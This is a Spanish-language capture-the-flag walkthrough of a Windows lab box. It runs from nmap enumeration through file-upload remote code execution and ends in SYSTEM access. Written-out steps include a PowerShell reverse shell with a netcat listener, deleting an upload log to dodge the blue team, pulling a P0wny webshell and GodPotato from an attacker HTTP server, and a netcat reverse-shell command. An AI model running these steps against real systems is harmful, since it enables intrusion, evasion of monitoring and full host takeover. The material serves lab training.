🥷Stealth (Windows)
Use your evasion skills to pwn a Windows target with an updated defence mechanism.
Enumeración de Red
Nmap
sudo nmap -sS --min-rate 5000 -p- --open -n -Pn 10.10.131.99 -oN puertos
nmap -sCV -p139,445,3389,5985,7680,8000,8080,8443,47001,49664,49665,49666,49667,49668,49670,49672 10.10.131.99 -oN nmapResultado nmap
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HOSTEVASION
| NetBIOS_Domain_Name: HOSTEVASION
| NetBIOS_Computer_Name: HOSTEVASION
| DNS_Domain_Name: HostEvasion
| DNS_Computer_Name: HostEvasion
| Product_Version: 10.0.17763
|_ System_Time: 2025-08-03T11:00:29+00:00
| ssl-cert: Subject: commonName=HostEvasion
| Not valid before: 2025-08-02T10:53:10
|_Not valid after: 2026-02-01T10:53:10
|_ssl-date: 2025-08-03T11:01:08+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp filtered pando-pub
8000/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
8080/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: PowerShell Script Analyser
8443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_http-title: PowerShell Script Analyser
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-08-03T11:00:29
|_ start_date: N/ASistema Windows
Enumeración SMB/RPC - Null Session
smbclient -L //10.10.131.99 -NAccess denied
rpcclient -U "" 10.10.131.99 -NAccess denied
Enumeración de Servicio Web
http://10.10.131.99:8000/
Not Found The requested resource / was not found on this server.
http://10.10.131.99:8080/
8080/tcp open - http - Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: PowerShell Script AnalyserPowerShell Script Analyser Please upload any .ps1 PowerShell script to see if it is malicious or not (Dev Mode). The tool is in dev-mode and only allow .ps1 format at this stage.
PowerShell Reverse Shell en archivo .ps1 malicioso?
Explotación: File Upload a RCE
PowerShell Reverse Shell Interactiva
nc -lvnp <port>Subir archivo > Ejecución automática
Intrusión en el Sistema
Shell: hostevasion\evader
Enumeración Post-Intrusión
C:\Users\evader\desktop\encodedflag
echo "encodedflag" | base64 -dYou can get the flag by visiting the link http://<IP_OF_THIS_PC>:8000/asdasdadasdjakjdnsdfsdfs.php
http://10.10.131.99:8000/asdasdadasdjakjdnsdfsdfs.php
Hey, seems like you have uploaded invalid file. Blue team has been alerted. Hint: Maybe removing the logs files for file uploads can help?
Obtención de User Flag
C:\Users\evader\documents\task\file.ps1
$FolderPath = "C:\xampp\htdocs\uploads\"C:\xampp\htdocs\uploads\
log.txt
rm C:\xampp\htdocs\uploads\log.txtFlag: http://10.10.131.99:8000/asdasdadasdjakjdnsdfsdfs.php
Enumeración de Superficie
whoami /allbuiltin\Users
Ningún privilegio útil
cd C:\xampp\htdocs\
icacls .builtin\Users: (F)
Las instalaciones XAMPP en Windows, registran Apache como servicio bajo la cuenta LocalSystem, cuyo token incorpora de forma nativa el privilegio
SeImpersonatePrivilegeAl desplegar una webshell en el directorio raíz de la aplicación y ejecutarla vía HTTP, el intérprete PHP se carga en el contexto del proceso de Apache, heredando íntegramente el token con el privilegioSeImpersonatehabilitado.
Desplegando P0wny-Shell
python3 -m http.servercd C:\xampp\htdocs\
wget http://<ip-a>/pony.php pony.phpwebshell: http://10.10.131.99:8080/pony.php
whoami /privNuevo privilegio en contexto de servicio
Privilege Name Description State
======================= ========================================= ========
SeImpersonatePrivilege Impersonate a client after authentication EnabledEscalada de Privilegios - SeImpersonate Privilege
Escalada con RogueWinRM
winrm enumerate winrm/config/listenerWinRM está en ejecución
Status Name DisplayName
------ ---- -----------
Running WinRM Windows Remote Management (WS-Manag...No vulnerable a RogueWinRM
Escalada con GodPotato
Potato privilege escalation is usually used when we obtain WEB/database privileges. We can elevate a service user with low privileges to “NT AUTHORITY\SYSTEM” privileges.
python3 -m http.servercd C:\xampp\htdocs\
wget http://<ip-a>/potato.exe potato.exewebshell: http://10.10.131.99:8080/pony.php
potato.exe -cmd "nc -t -e C:\Windows\System32\cmd.exe <ip-a> <port>"Compromiso del Sistema
Shell: NT AUTHORITY\SYSTEM
Última actualización